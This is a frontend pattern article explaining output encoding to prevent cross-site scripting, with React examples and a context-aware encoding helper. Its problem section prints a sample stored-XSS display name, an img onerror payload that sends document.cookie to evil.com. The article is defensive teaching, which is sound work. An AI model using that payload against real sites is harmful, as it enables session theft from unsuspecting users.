Skip to main content
Saved
Pattern
Difficulty Advanced

Output Encoding

Escape data properly when rendering to prevent XSS by ensuring user input is treated as data, not executable code.

Den Odell
By Den Odell Added

Output Encoding

Problem

A user signs up with the display name <img src=x onerror="fetch('https://evil.com?c='+document.cookie)">. Nothing visibly breaks at signup. But the moment another user opens a page that renders that name into the DOM, the browser parses it as a real image tag, the onerror handler fires, and the victim’s session cookie is shipping off to an attacker’s server. They never clicked anything. That’s cross-site scripting (XSS), and it happens because data the application treated as a plain string was handed to the browser in a context where it became markup.

The danger compounds with stored XSS. When that malicious display name lands in your database, it isn’t a one-time event; it’s a payload that re-executes for every single user who loads the affected page, silently, until someone notices and scrubs the record. A single unencoded field in a comment, a bio, a product review, or an uploaded filename can compromise thousands of accounts before anyone files a bug report.

What makes this genuinely hard is that “encoding” isn’t one operation. The same string is dangerous in different ways depending on where it’s rendered. Dropped into an HTML body, < opens a tag. Dropped into an attribute value, " breaks out of the quotes. Dropped into an inline <script> block, a </script> sequence or a stray quote terminates the string and starts new code. Dropped into a URL, an & or # rewrites the query. Encode for the wrong context and you’ve left the door open while believing it’s locked.

Solution

Encode user-provided data for the specific destination context before it reaches the page. Each context has its own escaping rules. HTML body context converts < to &lt;, > to &gt;, and & to &amp; so characters render as text instead of tags. Attribute context additionally escapes quotes so input can’t break out of the attribute it sits in. JavaScript context uses JSON.stringify to produce a safely quoted and escaped string literal rather than concatenating raw input into code. URL context uses encodeURIComponent so query values can’t inject extra parameters or fragments.

The good news: React, Vue, and Svelte all auto-escape text bindings by default. Interpolating a value with {value}, {{ value }}, or {value} runs it through HTML encoding for you, and attribute bindings like :href or className={...} are escaped too. For the overwhelming majority of rendering, doing the safe thing requires no extra effort, which is exactly the point of a safe-by-default design.

The risk lives in the escape hatches. Every framework offers an API that injects raw markup and skips encoding entirely: React’s dangerouslySetInnerHTML, Vue’s v-html, Svelte’s {@html}, and the DOM’s innerHTML. Developers reach for these to render trusted HTML, such as a CMS article body or sanitized rich text, but they are exactly where XSS sneaks in. Treat them as a deliberate decision, never a convenience, and never point them at user input that hasn’t been run through a dedicated sanitizer like DOMPurify first.

Output encoding is the last line of defense, not the only one. It pairs with input handling on the way in (validation and sanitization) and with a Content Security Policy that limits what injected scripts can do even if something slips through. Encoding ensures data is treated as data; the other layers reduce the blast radius if it ever isn’t.

Example

These examples show the safe-by-default text binding in each framework alongside the unsafe escape hatch you should avoid for untrusted data.

Safe Bindings vs Escape Hatches

function Comment({ body, authorUrl }) {
  // Safe: React escapes interpolated text and attribute values by default.
  // A body of "<script>alert(1)</script>" renders as visible text.
  return (
    <article>
      <a href={authorUrl}>Author</a>
      <p>{body}</p>
    </article>
  );
}

// Unsafe: dangerouslySetInnerHTML skips all encoding.
// Only use with sanitized HTML from a trusted source.
function RichComment({ trustedHtml }) {
  return <p dangerouslySetInnerHTML={{ __html: trustedHtml }} />;
}

Context-Aware Encoding Helper

When you must build markup or URLs by hand, encode explicitly for the context the value lands in. HTML text needs entity escaping; a value going into a URL needs encodeURIComponent:

// Escape for HTML body and attribute contexts.
// Replace & first so later replacements aren't double-encoded.
function encodeHTML(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Build a safe link: escape the text for HTML, encode the query for URLs.
function searchLink(query) {
  const href = `/search?q=${encodeURIComponent(query)}`;
  return `<a href="${encodeHTML(href)}">${encodeHTML(query)}</a>`;
}

// JavaScript context: never concatenate raw input into code.
// JSON.stringify produces a safely quoted, escaped string literal.
function inlineScript(message) {
  return `<script>showToast(${JSON.stringify(message)})<\/script>`;
}

Benefits

  • Neutralizes XSS at the rendering boundary by guaranteeing user data is treated as data, not executable code.
  • Works as a last line of defense that still holds even when input validation or sanitization upstream misses something.
  • Framework auto-escaping makes the safe path the default path, so most rendering is protected with zero extra code.
  • Context-specific encoding covers every output surface: HTML bodies, attributes, inline scripts, and URLs.
  • Defends against stored XSS, where a single unencoded record would otherwise re-execute for every viewer.
  • Pairs cleanly with defense-in-depth layers like Content Security Policy and a sanitizer for the rare cases you must render real HTML.
  • Built-in browser APIs like textContent and encodeURIComponent handle the heavy lifting without third-party dependencies.

Tradeoffs

  • Correctness depends on the context: encoding for HTML when the value lands in a URL or a script offers no protection and gives a false sense of safety.
  • Applying encoding twice double-encodes the data, so < becomes &amp;lt; and renders literally on screen as a visible bug.
  • Hand-rolled HTML encoders miss edge cases (unquoted attributes, JavaScript URLs, mismatched character sets); a vetted library is safer for anything non-trivial.
  • The escape hatches (dangerouslySetInnerHTML, v-html, {@html}, innerHTML) silently bypass all encoding, and one careless use reopens the vulnerability.
  • Rich text that must contain real HTML can’t be solved by encoding alone and requires a dedicated sanitizer such as DOMPurify.
  • Encoding is not a substitute for input handling or CSP; relying on it as the only defense leaves you brittle.
  • Reviewing for missed encoding across a large codebase is tedious, since the dangerous path looks almost identical to the safe one.

Summary

Output encoding ensures user input is rendered as inert text by escaping it for the exact context it lands in, whether HTML body, attribute, JavaScript, or URL. Lean on framework auto-escaping for the common case, treat every escape hatch as a deliberate decision backed by sanitization, and pair encoding with input handling and a Content Security Policy. It is the last line of defense against XSS, and it only works when applied correctly for each context.

Newsletter

A Monthly Email
from Den Odell

Behind-the-scenes thinking on frontend patterns, site updates, and more

No spam. Unsubscribe anytime.